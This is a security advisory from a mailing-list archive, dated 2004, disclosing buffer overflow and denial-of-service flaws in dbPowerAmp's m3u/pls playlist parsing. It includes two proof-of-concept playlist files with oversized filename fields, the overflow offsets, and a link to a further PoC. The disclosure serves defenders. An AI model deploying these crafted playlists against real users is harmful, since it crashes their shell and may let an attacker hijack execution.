[NT] dbPowerAmp Buffer Overflow and DoS Vulnerabilities

• Previous message: SecuriTeam: "[NT] Remote Buffer overflow Vulnerability in YPOPs!"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 4 Oct 2004 13:54:57 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  dbPowerAmp Buffer Overflow and DoS Vulnerabilities
------------------------------------------------------------------------

SUMMARY

Often called the Swiss Army knife of audio, <http://www.dbpoweramp.com>
dMC can digitally rip sound from audio CDs to a multitude of formats.
Convert from one format to another while preserving ID tags. Nearly every
audio type is supported, including MP3, MP4, Windows Media Audio (WMA),
OGG Vorbis, AAC, Monkey's Audio, and FLAC (with optional installs from
Codec Central).

Both the very popular dbPowerAmp Music Converter application, as well as
the dbPowerAmp Player are prone to buffer overflow conditions when parsing
the filename field of a playlist file.

DETAILS

Vulnerable Systems:
 * dbPowerAmp Music Converter and player, all versions

Buffer Overflows
While parsing m3u and pls playlist files, dbPowerAmp allocates only 215
bytes for handling of the filename in a playlist. By creating a specially
playlist file it is easily possible to overwrite EIP due to the nature of
the buffer overflow. Example:
[playlist]
NumberOfEntries=1
File1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBB
Title1=GulfTech dbPowerAmp Music Converter POC
Length1=-1

Note: For the player and the playlist editor a different value is used. A
value of 265 bytes is sufficient to overwrite the return address. There is
no reason to believe that other playlist file types are not plagued with
the same issue (i.e: mcc files, or Music Converter Collection files.)

Denial Of Service
The music converter has an advanced option which allows it to be
integrated into the Windows Shell. A malformed playlist file will
automatically cause a DoS condition for the Windows Shell, even if the
playlist isn't opened. It is sufficient to move the mouse cursor above it.
A sample of such a playlist can look something similar to:
[playlist]
NumberOfEntries=1
File1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Title1=GulfTech dbPowerAmp Music Converter Crash POC
Length1=-1

The large filename entry in the playlist will overwrite EDI with junk and
then cause an access violation. This will then cause Explorer to crash.

A proof of concept can be obtained from
<http://www.gulftech.org/downloads/?file_id=00022>
http://www.gulftech.org/downloads/?file_id=00022

ADDITIONAL INFORMATION

The information has been provided by <mailto:security@gulftech.org>
GulfTech Security.
The original article can be found at:
<http://www.gulftech.org/?node=research&article_id=00052-09272004>
http://www.gulftech.org/?node=research&article_id=00052-09272004

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] Remote Buffer overflow Vulnerability in YPOPs!"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]